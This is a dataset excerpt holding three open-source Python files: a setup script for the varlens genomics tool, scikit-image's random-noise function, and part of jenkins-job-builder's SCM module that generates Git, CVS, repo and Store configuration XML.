text
stringlengths 12
1.05M
| repo_name
stringlengths 5
86
| path
stringlengths 4
191
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 12
1.05M
| keyword
listlengths 1
23
| text_hash
stringlengths 64
64
|
|---|---|---|---|---|---|---|---|
# Copyright (c) 2014-2018. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import re
from setuptools import setup
current_directory = os.path.dirname(__file__)
with open('varlens/__init__.py', 'r') as f:
version = re.search(
r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
f.read(),
re.MULTILINE).group(1)
if __name__ == '__main__':
setup(
name='varlens',
packages=["varlens", "varlens.commands", "varlens.read_evidence"],
version=version,
description=(
"commandline manipulation of genomic variants and NGS reads"),
long_description=open('README.rst').read(),
url="https://github.com/openvax/varlens",
author="Tim O'Donnell",
author_email="timodonnell@gmail.com",
license="http://www.apache.org/licenses/LICENSE-2.0.html",
entry_points={
'console_scripts': [
'varlens-allele-support = varlens.commands.allele_support:run',
'varlens-variants = varlens.commands.variants:run',
'varlens-reads = varlens.commands.reads:run',
],
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Scientific/Engineering :: Bio-Informatics',
],
install_requires=[
'cython>=0.21',
'numpy',
'intervaltree',
'pysam>=0.13',
'typechecks',
'varcode',
'pyfaidx',
'mhctools',
'topiary',
],
)
|
hammerlab/varlens
|
setup.py
|
Python
|
apache-2.0
| 2,375
|
[
"pysam"
] |
de7b7fa6e101ddd73047b49b9e3376760b75da44f2580574c8fd1e7ae817dc5b
|
import numpy as np
from .dtype import img_as_float
__all__ = ['random_noise']
def random_noise(image, mode='gaussian', seed=None, clip=True, **kwargs):
"""
Function to add random noise of various types to a floating-point image.
Parameters
----------
image : ndarray
Input image data. Will be converted to float.
mode : str
One of the following strings, selecting the type of noise to add:
- 'gaussian' Gaussian-distributed additive noise.
- 'localvar' Gaussian-distributed additive noise, with specified
local variance at each point of `image`
- 'poisson' Poisson-distributed noise generated from the data.
- 'salt' Replaces random pixels with 1.
- 'pepper' Replaces random pixels with 0.
- 's&p' Replaces random pixels with 0 or 1.
- 'speckle' Multiplicative noise using out = image + n*image, where
n is uniform noise with specified mean & variance.
seed : int
If provided, this will set the random seed before generating noise,
for valid pseudo-random comparisons.
clip : bool
If True (default), the output will be clipped after noise applied
for modes `'speckle'`, `'poisson'`, and `'gaussian'`. This is
needed to maintain the proper image data range. If False, clipping
is not applied, and the output may extend beyond the range [-1, 1].
mean : float
Mean of random distribution. Used in 'gaussian' and 'speckle'.
Default : 0.
var : float
Variance of random distribution. Used in 'gaussian' and 'speckle'.
Note: variance = (standard deviation) ** 2. Default : 0.01
local_vars : ndarray
Array of positive floats, same shape as `image`, defining the local
variance at every image point. Used in 'localvar'.
amount : float
Proportion of image pixels to replace with noise on range [0, 1].
Used in 'salt', 'pepper', and 'salt & pepper'. Default : 0.05
salt_vs_pepper : float
Proportion of salt vs. pepper noise for 's&p' on range [0, 1].
Higher values represent more salt. Default : 0.5 (equal amounts)
Returns
-------
out : ndarray
Output floating-point image data on range [0, 1] or [-1, 1] if the
input `image` was unsigned or signed, respectively.
Notes
-----
Speckle, Poisson, Localvar, and Gaussian noise may generate noise outside
the valid image range. The default is to clip (not alias) these values,
but they may be preserved by setting `clip=False`. Note that in this case
the output may contain values outside the ranges [0, 1] or [-1, 1].
Use this option with care.
Because of the prevalence of exclusively positive floating-point images in
intermediate calculations, it is not possible to intuit if an input is
signed based on dtype alone. Instead, negative values are explicity
searched for. Only if found does this function assume signed input.
Unexpected results only occur in rare, poorly exposes cases (e.g. if all
values are above 50 percent gray in a signed `image`). In this event,
manually scaling the input to the positive domain will solve the problem.
The Poisson distribution is only defined for positive integers. To apply
this noise type, the number of unique values in the image is found and
the next round power of two is used to scale up the floating-point result,
after which it is scaled back down to the floating-point image range.
To generate Poisson noise against a signed image, the signed image is
temporarily converted to an unsigned image in the floating point domain,
Poisson noise is generated, then it is returned to the original range.
"""
mode = mode.lower()
# Detect if a signed image was input
if image.min() < 0:
low_clip = -1.
else:
low_clip = 0.
image = img_as_float(image)
if seed is not None:
np.random.seed(seed=seed)
allowedtypes = {
'gaussian': 'gaussian_values',
'localvar': 'localvar_values',
'poisson': 'poisson_values',
'salt': 'sp_values',
'pepper': 'sp_values',
's&p': 's&p_values',
'speckle': 'gaussian_values'}
kwdefaults = {
'mean': 0.,
'var': 0.01,
'amount': 0.05,
'salt_vs_pepper': 0.5,
'local_vars': np.zeros_like(image) + 0.01}
allowedkwargs = {
'gaussian_values': ['mean', 'var'],
'localvar_values': ['local_vars'],
'sp_values': ['amount'],
's&p_values': ['amount', 'salt_vs_pepper'],
'poisson_values': []}
for key in kwargs:
if key not in allowedkwargs[allowedtypes[mode]]:
raise ValueError('%s keyword not in allowed keywords %s' %
(key, allowedkwargs[allowedtypes[mode]]))
# Set kwarg defaults
for kw in allowedkwargs[allowedtypes[mode]]:
kwargs.setdefault(kw, kwdefaults[kw])
if mode == 'gaussian':
noise = np.random.normal(kwargs['mean'], kwargs['var'] ** 0.5,
image.shape)
out = image + noise
elif mode == 'localvar':
# Ensure local variance input is correct
if (kwargs['local_vars'] <= 0).any():
raise ValueError('All values of `local_vars` must be > 0.')
# Safe shortcut usage broadcasts kwargs['local_vars'] as a ufunc
out = image + np.random.normal(0, kwargs['local_vars'] ** 0.5)
elif mode == 'poisson':
# Determine unique values in image & calculate the next power of two
vals = len(np.unique(image))
vals = 2 ** np.ceil(np.log2(vals))
# Ensure image is exclusively positive
if low_clip == -1.:
old_max = image.max()
image = (image + 1.) / (old_max + 1.)
# Generating noise for each unique value in image.
out = np.random.poisson(image * vals) / float(vals)
# Return image to original range if input was signed
if low_clip == -1.:
out = out * (old_max + 1.) - 1.
elif mode == 'salt':
# Re-call function with mode='s&p' and p=1 (all salt noise)
out = random_noise(image, mode='s&p', seed=seed,
amount=kwargs['amount'], salt_vs_pepper=1.)
elif mode == 'pepper':
# Re-call function with mode='s&p' and p=1 (all pepper noise)
out = random_noise(image, mode='s&p', seed=seed,
amount=kwargs['amount'], salt_vs_pepper=0.)
elif mode == 's&p':
# This mode makes no effort to avoid repeat sampling. Thus, the
# exact number of replaced pixels is only approximate.
out = image.copy()
# Salt mode
num_salt = np.ceil(
kwargs['amount'] * image.size * kwargs['salt_vs_pepper'])
coords = [np.random.randint(0, i - 1, int(num_salt))
for i in image.shape]
out[coords] = 1
# Pepper mode
num_pepper = np.ceil(
kwargs['amount'] * image.size * (1. - kwargs['salt_vs_pepper']))
coords = [np.random.randint(0, i - 1, int(num_pepper))
for i in image.shape]
out[coords] = low_clip
elif mode == 'speckle':
noise = np.random.normal(kwargs['mean'], kwargs['var'] ** 0.5,
image.shape)
out = image + image * noise
# Clip back to original range, if necessary
if clip:
out = np.clip(out, low_clip, 1.0)
return out
|
Hiyorimi/scikit-image
|
skimage/util/noise.py
|
Python
|
bsd-3-clause
| 7,628
|
[
"Gaussian"
] |
76968f7e0b827c652e9a807193692ec11c4abbb20c90ee7200c9b192591559eb
|
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The SCM module allows you to specify the source code location for the
project. It adds the ``scm`` attribute to the :ref:`Job` definition,
which accepts any number of scm definitions. It is also possible to pass
``[]`` to the ``scm`` attribute. This is useful when a set of configs has a
global default ``scm`` and you want to a particular job to override that
default with no SCM.
**Component**: scm
:Macro: scm
:Entry Point: jenkins_jobs.scm
The scm module allows referencing multiple repositories in a Jenkins job.
Note: Adding more than one scm definition requires the Jenkins
:jenkins-wiki:`Multiple SCMs plugin <Multiple+SCMs+Plugin>`.
Example of multiple repositories in a single job:
.. literalinclude:: /../../tests/macros/fixtures/scm/multi-scms001.yaml
Example of an empty ``scm``:
.. literalinclude:: /../../tests/scm/fixtures/empty.yaml
"""
import logging
import xml.etree.ElementTree as XML
import jenkins_jobs.modules.base
from jenkins_jobs.errors import (InvalidAttributeError,
JenkinsJobsException,
MissingAttributeError)
def git(parser, xml_parent, data):
"""yaml: git
Specifies the git SCM repository for this job.
Requires the Jenkins :jenkins-wiki:`Git Plugin <Git+Plugin>`.
:arg str url: URL of the git repository
:arg str credentials-id: ID of credential to use to connect, which is the
last field (a 32-digit hexadecimal code) of the path of URL visible
after you clicked the credential under Jenkins Global credentials.
(optional)
:arg str refspec: refspec to fetch (default
'+refs/heads/\*:refs/remotes/remoteName/\*')
:arg str name: name to fetch (default 'origin')
:arg list(str) remotes: list of remotes to set up (optional, only needed if
multiple remotes need to be set up)
:Remote:
* **url** (`string`) - url of remote repo
* **refspec** (`string`) - refspec to fetch (optional)
* **credentials-id** - ID of credential to use to connect, which
is the last field of the path of URL (a 32-digit hexadecimal
code) visible after you clicked credential under Jenkins Global
credentials. (optional)
:arg list(str) branches: list of branch specifiers to build (default '**')
:arg list(str) excluded-users: list of users to ignore revisions from
when polling for changes. (if polling is enabled, optional)
:arg list(str) included-regions: list of file/folders to include (optional)
:arg list(str) excluded-regions: list of file/folders to exclude (optional)
:arg str local-branch: Checkout/merge to local branch (optional)
:arg dict merge:
:merge:
* **remote** (`string`) - name of repo that contains branch to
merge to (default 'origin')
* **branch** (`string`) - name of the branch to merge to
* **strategy** (`string`) - merge strategy. Can be one of
'default', 'resolve', 'recursive', 'octopus', 'ours',
'subtree'. (default 'default')
* **fast-forward-mode** (`string`) - merge fast-forward mode.
Can be one of 'FF', 'FF_ONLY' or 'NO_FF'. (default 'FF')
:arg str basedir: location relative to the workspace root to clone to
(default workspace)
:arg bool skip-tag: Skip tagging (default false)
:arg bool shallow-clone: Perform shallow clone (default false)
:arg bool prune: Prune remote branches (default false)
:arg bool clean: Clean after checkout (default false)
.. deprecated:: 1.1.1. Please use clean extension format.
:arg bool fastpoll: Use fast remote polling (default false)
:arg bool disable-submodules: Disable submodules (default false)
.. deprecated:: 1.1.1. Please use submodule extension.
:arg bool recursive-submodules: Recursively update submodules (default
false)
.. deprecated:: 1.1.1. Please use submodule extension.
:arg bool use-author: Use author rather than committer in Jenkin's build
changeset (default false)
:arg str git-tool: The name of the Git installation to use (default
'Default')
:arg str reference-repo: Path of the reference repo to use during clone
(optional)
:arg str scm-name: The unique scm name for this Git SCM (optional)
:arg bool ignore-notify: Ignore notifyCommit URL accesses (default false)
:arg str browser: what repository browser to use.
:browsers supported:
* **auto** - (default)
* **assemblaweb** - https://www.assembla.com/
* **bitbucketweb** - https://www.bitbucket.org/
* **cgit** - http://git.zx2c4.com/cgit/about/
* **fisheye** - https://www.atlassian.com/software/fisheye
* **gitblit** - http://gitblit.com/
* **githubweb** - https://github.com/
* **gitiles** - https://code.google.com/p/gitiles/
* **gitlab** - https://about.gitlab.com/
* **gitlist** - http://gitlist.org/
* **gitoriousweb** - https://gitorious.org/
* **gitweb** - http://git-scm.com/docs/gitweb
* **kiln** - https://www.fogcreek.com/kiln/
* **microsoft\-tfs\-2013** - |tfs_2013|
* **phabricator** - http://phabricator.org/
* **redmineweb** - http://www.redmine.org/
* **rhodecode** - https://rhodecode.com/
* **stash** - https://www.atlassian.com/software/stash
* **viewgit** - http://viewgit.fealdia.org/
:arg str browser-url: url for the repository browser (required if browser
is not 'auto', no default)
:arg str browser-version: version of the repository browser (GitLab only,
default '0.0')
:arg str project-name: project name in Gitblit and ViewGit repobrowser
(optional)
:arg str repo-name: repository name in phabricator repobrowser (optional)
:arg str choosing-strategy: Jenkins class for selecting what to build.
Can be one of `default`, `inverse`, or `gerrit` (default 'default')
:arg str git-config-name: Configure name for Git clone (optional)
:arg str git-config-email: Configure email for Git clone (optional)
:extensions:
* **changelog-against** (`dict`)
* **remote** (`string`) - name of repo that contains branch to
create changelog against (default 'origin')
* **branch** (`string`) - name of the branch to create changelog
against (default 'master')
* **clean** (`dict`)
* **after** (`bool`) - Clean the workspace after checkout
* **before** (`bool`) - Clean the workspace before checkout
* **ignore-commits-with-messages** (`list(str)`) - Revisions committed
with messages matching these patterns will be ignored. (optional)
* **force-polling-using-workspace** (`bool`) - Force polling using
workspace (default false)
* **sparse-checkout** (`dict`)
* **paths** (`list`) - List of paths to sparse checkout. (optional)
* **submodule** (`dict`)
* **disable** (`bool`) - By disabling support for submodules you
can still keep using basic git plugin functionality and just have
Jenkins to ignore submodules completely as if they didn't exist.
* **recursive** (`bool`) - Retrieve all submodules recursively
(uses '--recursive' option which requires git>=1.6.5)
* **tracking** (`bool`) - Retrieve the tip of the configured
branch in .gitmodules (Uses '\-\-remote' option which requires
git>=1.8.2)
* **timeout** (`int`) - Specify a timeout (in minutes) for
submodules operations (default: 10).
* **timeout** (`str`) - Timeout for git commands in minutes (optional)
* **wipe-workspace** (`bool`) - Wipe out workspace before build
(default true)
Example:
.. literalinclude:: /../../tests/scm/fixtures/git001.yaml
.. |tfs_2013| replace::
https://www.visualstudio.com/en-us/products/tfs-overview-vs.aspx
"""
logger = logging.getLogger("%s:git" % __name__)
# XXX somebody should write the docs for those with option name =
# None so we have a sensible name/key for it.
mapping = [
# option, xml name, default value (text), attributes (hard coded)
("disable-submodules", 'disableSubmodules', False),
("recursive-submodules", 'recursiveSubmodules', False),
(None, 'doGenerateSubmoduleConfigurations', False),
("use-author", 'authorOrCommitter', False),
("wipe-workspace", 'wipeOutWorkspace', True),
("prune", 'pruneBranches', False),
("fastpoll", 'remotePoll', False),
("git-tool", 'gitTool', "Default"),
(None, 'submoduleCfg', '', {'class': 'list'}),
('basedir', 'relativeTargetDir', ''),
('reference-repo', 'reference', ''),
("git-config-name", 'gitConfigName', ''),
("git-config-email", 'gitConfigEmail', ''),
('skip-tag', 'skipTag', False),
('scm-name', 'scmName', ''),
("shallow-clone", "useShallowClone", False),
("ignore-notify", "ignoreNotifyCommit", False),
]
choosing_strategies = {
'default': 'hudson.plugins.git.util.DefaultBuildChooser',
'gerrit': ('com.sonyericsson.hudson.plugins.'
'gerrit.trigger.hudsontrigger.GerritTriggerBuildChooser'),
'inverse': 'hudson.plugins.git.util.InverseBuildChooser',
}
scm = XML.SubElement(xml_parent,
'scm', {'class': 'hudson.plugins.git.GitSCM'})
XML.SubElement(scm, 'configVersion').text = '2'
user = XML.SubElement(scm, 'userRemoteConfigs')
if 'remotes' not in data:
data['remotes'] = [{data.get('name', 'origin'): data.copy()}]
for remoteData in data['remotes']:
huser = XML.SubElement(user, 'hudson.plugins.git.UserRemoteConfig')
remoteName = next(iter(remoteData.keys()))
XML.SubElement(huser, 'name').text = remoteName
remoteParams = next(iter(remoteData.values()))
if 'refspec' in remoteParams:
refspec = remoteParams['refspec']
else:
refspec = '+refs/heads/*:refs/remotes/' + remoteName + '/*'
XML.SubElement(huser, 'refspec').text = refspec
if 'url' in remoteParams:
remoteURL = remoteParams['url']
else:
raise JenkinsJobsException('Must specify a url for git remote \"' +
remoteName + '"')
XML.SubElement(huser, 'url').text = remoteURL
if 'credentials-id' in remoteParams:
credentialsId = remoteParams['credentials-id']
XML.SubElement(huser, 'credentialsId').text = credentialsId
xml_branches = XML.SubElement(scm, 'branches')
branches = data.get('branches', ['**'])
for branch in branches:
bspec = XML.SubElement(xml_branches, 'hudson.plugins.git.BranchSpec')
XML.SubElement(bspec, 'name').text = branch
excluded_users = '\n'.join(data.get('excluded-users', []))
XML.SubElement(scm, 'excludedUsers').text = excluded_users
if 'merge' in data:
merge = data['merge']
merge_strategies = ['default', 'resolve', 'recursive', 'octopus',
'ours', 'subtree']
fast_forward_modes = ['FF', 'FF_ONLY', 'NO_FF']
name = merge.get('remote', 'origin')
branch = merge['branch']
urc = XML.SubElement(scm, 'userMergeOptions')
XML.SubElement(urc, 'mergeRemote').text = name
XML.SubElement(urc, 'mergeTarget').text = branch
strategy = merge.get('strategy', 'default')
if strategy not in merge_strategies:
raise InvalidAttributeError('strategy', strategy, merge_strategies)
XML.SubElement(urc, 'mergeStrategy').text = strategy
fast_forward_mode = merge.get('fast-forward-mode', 'FF')
if fast_forward_mode not in fast_forward_modes:
raise InvalidAttributeError('fast-forward-mode', fast_forward_mode,
fast_forward_modes)
XML.SubElement(urc, 'fastForwardMode').text = fast_forward_mode
try:
choosing_strategy = choosing_strategies[data.get('choosing-strategy',
'default')]
except KeyError:
raise ValueError('Invalid choosing-strategy %r' %
data.get('choosing-strategy'))
XML.SubElement(scm, 'buildChooser', {'class': choosing_strategy})
for elem in mapping:
(optname, xmlname, val) = elem[:3]
# Throw warning for deprecated settings and skip if the 'submodule' key
# is available.
submodule_cfgs = ['disable-submodules', 'recursive-submodules']
if optname in submodule_cfgs:
if optname in data:
logger.warn("'{0}' is deprecated, please convert to use the "
"'submodule' section instead as support for this "
"top level option will be removed in a future "
"release.".format(optname))
if 'submodule' in data:
continue
attrs = {}
if len(elem) >= 4:
attrs = elem[3]
xe = XML.SubElement(scm, xmlname, attrs)
if optname and optname in data:
val = data[optname]
if type(val) == bool:
xe.text = str(val).lower()
else:
xe.text = val
if 'local-branch' in data:
XML.SubElement(scm, 'localBranch').text = data['local-branch']
exts_node = XML.SubElement(scm, 'extensions')
impl_prefix = 'hudson.plugins.git.extensions.impl.'
if 'included-regions' in data or 'excluded-regions' in data:
ext_name = XML.SubElement(exts_node,
'hudson.plugins.git.extensions.impl.'
'PathRestriction')
if 'included-regions' in data:
include_string = '\n'.join(data['included-regions'])
XML.SubElement(ext_name, 'includedRegions').text = include_string
if 'excluded-regions' in data:
exclude_string = '\n'.join(data['excluded-regions'])
XML.SubElement(ext_name, 'excludedRegions').text = exclude_string
if 'changelog-against' in data:
ext_name = impl_prefix + 'ChangelogToBranch'
ext = XML.SubElement(exts_node, ext_name)
opts = XML.SubElement(ext, 'options')
change_remote = data['changelog-against'].get('remote', 'origin')
change_branch = data['changelog-against'].get('branch', 'master')
XML.SubElement(opts, 'compareRemote').text = change_remote
XML.SubElement(opts, 'compareTarget').text = change_branch
if 'clean' in data:
# Keep support for old format 'clean' configuration by checking
# if 'clean' is boolean. Else we're using the new extensions style.
if isinstance(data['clean'], bool):
clean_after = data['clean']
clean_before = False
logger.warn("'clean: bool' configuration format is deprecated, "
"please use the extension style format to configure "
"this option.")
else:
clean_after = data['clean'].get('after', False)
clean_before = data['clean'].get('before', False)
if clean_after:
ext_name = impl_prefix + 'CleanCheckout'
ext = XML.SubElement(exts_node, ext_name)
if clean_before:
ext_name = impl_prefix + 'CleanBeforeCheckout'
ext = XML.SubElement(exts_node, ext_name)
if 'ignore-commits-with-messages' in data:
for msg in data['ignore-commits-with-messages']:
ext_name = impl_prefix + 'MessageExclusion'
ext = XML.SubElement(exts_node, ext_name)
XML.SubElement(ext, 'excludedMessage').text = msg
if 'sparse-checkout' in data:
ext_name = impl_prefix + 'SparseCheckoutPaths'
ext = XML.SubElement(exts_node, ext_name)
sparse_co = XML.SubElement(ext, 'sparseCheckoutPaths')
sparse_paths = data['sparse-checkout'].get('paths')
if sparse_paths is not None:
path_tagname = impl_prefix + 'SparseCheckoutPath'
for path in sparse_paths:
path_tag = XML.SubElement(sparse_co, path_tagname)
XML.SubElement(path_tag, 'path').text = path
if 'submodule' in data:
ext_name = impl_prefix + 'SubmoduleOption'
ext = XML.SubElement(exts_node, ext_name)
XML.SubElement(ext, 'disableSubmodules').text = str(
data['submodule'].get('disable', False)).lower()
XML.SubElement(ext, 'recursiveSubmodules').text = str(
data['submodule'].get('recursive', False)).lower()
XML.SubElement(ext, 'trackingSubmodules').text = str(
data['submodule'].get('tracking', False)).lower()
XML.SubElement(ext, 'timeout').text = str(
data['submodule'].get('timeout', 10))
if 'timeout' in data:
co = XML.SubElement(exts_node, impl_prefix + 'CheckoutOption')
XML.SubElement(co, 'timeout').text = str(data['timeout'])
polling_using_workspace = str(data.get('force-polling-using-workspace',
False)).lower()
if polling_using_workspace == 'true':
ext_name = impl_prefix + 'DisableRemotePoll'
ext = XML.SubElement(exts_node, ext_name)
# By default we wipe the workspace
wipe_workspace = str(data.get('wipe-workspace', True)).lower()
if wipe_workspace == 'true':
ext_name = impl_prefix + 'WipeWorkspace'
ext = XML.SubElement(exts_node, ext_name)
browser = data.get('browser', 'auto')
browserdict = {'auto': 'auto',
'assemblaweb': 'AssemblaWeb',
'bitbucketweb': 'BitbucketWeb',
'cgit': 'CGit',
'fisheye': 'FisheyeGitRepositoryBrowser',
'gitblit': 'GitBlitRepositoryBrowser',
'githubweb': 'GithubWeb',
'gitiles': 'Gitiles',
'gitlab': 'GitLab',
'gitlist': 'GitList',
'gitoriousweb': 'GitoriousWeb',
'gitweb': 'GitWeb',
'kiln': 'KilnGit',
'microsoft-tfs-2013': 'TFS2013GitRepositoryBrowser',
'phabricator': 'Phabricator',
'redmineweb': 'RedmineWeb',
'rhodecode': 'RhodeCode',
'stash': 'Stash',
'viewgit': 'ViewGitWeb'}
if browser not in browserdict:
valid = sorted(browserdict.keys())
raise JenkinsJobsException("Browser entered is not valid must be one "
"of: %s or %s." % (", ".join(valid[:-1]),
valid[-1]))
if browser != 'auto':
bc = XML.SubElement(scm, 'browser', {'class':
'hudson.plugins.git.browser.' +
browserdict[browser]})
XML.SubElement(bc, 'url').text = data['browser-url']
if browser in ['gitblit', 'viewgit']:
XML.SubElement(bc, 'projectName').text = str(
data.get('project-name', ''))
if browser == 'gitlab':
XML.SubElement(bc, 'version').text = str(
data.get('browser-version', '0.0'))
if browser == 'phabricator':
XML.SubElement(bc, 'repo').text = str(
data.get('repo-name', ''))
def cvs(parser, xml_parent, data):
"""yaml: cvs
Specifies the CVS SCM repository for this job.
Requires the Jenkins :jenkins-wiki:`CVS Plugin <CVS+Plugin>`.
:arg list repos: List of CVS repositories. (required)
:Repos:
* **root** (`str`) -- The CVS connection string Jenkins uses to
connect to the server. The format is :protocol:user@host:path
(required)
* **locations** (`list`) -- List of locations. (required)
:Locations:
* **type** (`str`) -- Type of location.
:supported values:
* **HEAD** - (default)
* **BRANCH**
* **TAG**
* **name** (`str`) -- Name of location. Only valid in case
of 'BRANCH' or 'TAG' location type. (default '')
* **use-head** (`bool`) -- Use Head if not found. Only
valid in case of 'BRANCH' or 'TAG' location type.
(default false)
* **modules** (`list`) -- List of modules. (required)
:Modules:
* **remote** -- The name of the module in the
repository at CVSROOT. (required)
* **local-name** -- The name to be applied to
this module in the local workspace. If blank,
the remote module name will be used.
(default '')
* **excluded-regions** (`list str`) -- Patterns for excluding
regions. (optional)
* **compression-level** (`int`) -- Compression level. Must be a
number between -1 and 9 inclusive. Choose -1 for System Default.
(default -1)
:arg bool use-update: If true, Jenkins will use 'cvs update' whenever
possible for builds. This makes a build faster. But this also causes the
artifacts from the previous build to remain in the file system when a
new build starts, making it not a true clean build. (default true)
:arg bool prune-empty: Remove empty directories after checkout using the
CVS '-P' option. (default true)
:arg bool skip-changelog: Prevent the changelog being generated after
checkout has completed. (default false)
:arg bool show-all-output: Instructs CVS to show all logging output. CVS
normally runs in quiet mode but this option disables that.
(default false)
:arg bool clean-checkout: Perform clean checkout on failed update.
(default false)
:arg bool clean-copy: Force clean copy for locally modified files.
(default false)
Example
.. literalinclude:: /../../tests/scm/fixtures/cvs001.yaml
:language: yaml
.. literalinclude:: /../../tests/scm/fixtures/cvs002.yaml
:language: yaml
"""
prefix = 'hudson.scm.'
valid_loc_types = {'HEAD': 'Head', 'TAG': 'Tag', 'BRANCH': 'Branch'}
cvs = XML.SubElement(xml_parent, 'scm', {'class': prefix + 'CVSSCM'})
repos = data.get('repos')
if not repos:
raise JenkinsJobsException("'repos' empty or missing")
repos_tag = XML.SubElement(cvs, 'repositories')
for repo in repos:
repo_tag = XML.SubElement(repos_tag, prefix + 'CvsRepository')
try:
XML.SubElement(repo_tag, 'cvsRoot').text = repo['root']
except KeyError:
raise MissingAttributeError('root')
items_tag = XML.SubElement(repo_tag, 'repositoryItems')
locations = repo.get('locations')
if not locations:
raise JenkinsJobsException("'locations' empty or missing")
for location in locations:
item_tag = XML.SubElement(items_tag, prefix + 'CvsRepositoryItem')
loc_type = location.get('type', 'HEAD')
if loc_type not in valid_loc_types:
raise InvalidAttributeError('type', loc_type, valid_loc_types)
loc_class = ('{0}CvsRepositoryLocation${1}Repository'
'Location').format(prefix, valid_loc_types[loc_type])
loc_tag = XML.SubElement(item_tag, 'location',
{'class': loc_class})
XML.SubElement(loc_tag, 'locationType').text = loc_type
if loc_type == 'TAG' or loc_type == 'BRANCH':
XML.SubElement(loc_tag, 'locationName').text = location.get(
'name', '')
XML.SubElement(loc_tag, 'useHeadIfNotFound').text = str(
location.get('use-head', False)).lower()
modules = location.get('modules')
if not modules:
raise JenkinsJobsException("'modules' empty or missing")
modules_tag = XML.SubElement(item_tag, 'modules')
for module in modules:
module_tag = XML.SubElement(modules_tag, prefix + 'CvsModule')
try:
XML.SubElement(module_tag, 'remoteName'
).text = module['remote']
except KeyError:
raise MissingAttributeError('remote')
XML.SubElement(module_tag, 'localName').text = module.get(
'local-name', '')
excluded = repo.get('excluded-regions', [])
excluded_tag = XML.SubElement(repo_tag, 'excludedRegions')
for pattern in excluded:
pattern_tag = XML.SubElement(excluded_tag,
prefix + 'ExcludedRegion')
XML.SubElement(pattern_tag, 'pattern').text = pattern
compression_level = repo.get('compression-level', '-1')
if int(compression_level) not in range(-1, 10):
raise InvalidAttributeError('compression-level',
compression_level, range(-1, 10))
XML.SubElement(repo_tag, 'compressionLevel').text = compression_level
mapping = [('use-update', 'canUseUpdate', True),
('prune-empty', 'pruneEmptyDirectories', True),
('skip-changelog', 'skipChangeLog', False),
('show-all-output', 'disableCvsQuiet', False),
('clean-checkout', 'cleanOnFailedUpdate', False),
('clean-copy', 'forceCleanCopy', False)]
for elem in mapping:
opt, xml_tag, val = elem[:]
XML.SubElement(cvs, xml_tag).text = str(
data.get(opt, val)).lower()
def repo(parser, xml_parent, data):
"""yaml: repo
Specifies the repo SCM repository for this job.
Requires the Jenkins :jenkins-wiki:`Repo Plugin <Repo+Plugin>`.
:arg str manifest-url: URL of the repo manifest
:arg str manifest-branch: The branch of the manifest to use (optional)
:arg str manifest-file: Initial manifest file to use when initialising
(optional)
:arg str manifest-group: Only retrieve those projects in the manifest
tagged with the provided group name (optional)
:arg str destination-dir: Location relative to the workspace root to clone
under (optional)
:arg str repo-url: custom url to retrieve the repo application (optional)
:arg str mirror-dir: Path to mirror directory to reference when
initialising (optional)
:arg int jobs: Number of projects to fetch simultaneously (default 0)
:arg bool current-branch: Fetch only the current branch from the server
(default true)
:arg bool quiet: Make repo more quiet
(default true)
:arg str local-manifest: Contents of .repo/local_manifest.xml, written
prior to calling sync (optional)
Example:
.. literalinclude:: /../../tests/scm/fixtures/repo001.yaml
"""
scm = XML.SubElement(xml_parent,
'scm', {'class': 'hudson.plugins.repo.RepoScm'})
if 'manifest-url' in data:
XML.SubElement(scm, 'manifestRepositoryUrl').text = \
data['manifest-url']
else:
raise JenkinsJobsException("Must specify a manifest url")
mapping = [
# option, xml name, default value
("manifest-branch", 'manifestBranch', ''),
("manifest-file", 'manifestFile', ''),
("manifest-group", 'manifestGroup', ''),
("destination-dir", 'destinationDir', ''),
("repo-url", 'repoUrl', ''),
("mirror-dir", 'mirrorDir', ''),
("jobs", 'jobs', 0),
("current-branch", 'currentBranch', True),
("quiet", 'quiet', True),
("local-manifest", 'localManifest', ''),
]
for elem in mapping:
(optname, xmlname, val) = elem
val = data.get(optname, val)
# Skip adding xml entry if default is empty string and no value given
if not val and elem[2] is '':
continue
xe = XML.SubElement(scm, xmlname)
if type(elem[2]) == bool:
xe.text = str(val).lower()
else:
xe.text = str(val)
def store(parser, xml_parent, data):
"""yaml: store
Specifies the Visualworks Smalltalk Store repository for this job.
Requires the Jenkins :jenkins-wiki:`Visualworks Smalltalk Store Plugin
<Visualworks+Smalltalk+Store+Plugin>`.
:arg str script: name of the Store script to run
:arg str repository: name of the Store repository
:arg str version-regex: regular expression that specifies which pundle
versions should be considered (optional)
:arg str minimum-blessing: minimum blessing level to consider (optional)
:arg str parcel-builder-file: name of the file to generate as input to
a later parcel building step (optional - if not specified, then no
parcel builder file will be generated)
:arg list pundles:
:(package or bundle): (`dict`): A package or bundle to check
Example:
.. literalinclude:: /../../tests/scm/fixtures/store001.yaml
"""
namespace = 'org.jenkinsci.plugins.visualworks_store'
scm = XML.SubElement(xml_parent, 'scm',
{'class': '{0}.StoreSCM'.format(namespace)})
if 'script' in data:
XML.SubElement(scm, 'scriptName').text = data['script']
else:
raise JenkinsJobsException("Must specify a script name")
if 'repository' in data:
XML.SubElement(scm, 'repositoryName').text = data['repository']
else:
raise JenkinsJobsException("Must specify a repository name")
pundle_specs = data.get('pundles', [])
if not pundle_specs:
raise JenkinsJobsException("At least one pundle must be specified")
valid_pundle_types = ['package', 'bundle']
pundles = XML.SubElement(scm, 'pundles')
for pundle_spec in pundle_specs:
pundle = XML.SubElement(pundles, '{0}.PundleSpec'.format(namespace))
pundle_type = next(iter(pundle_spec))
pundle_name = pundle_spec[pundle_type]
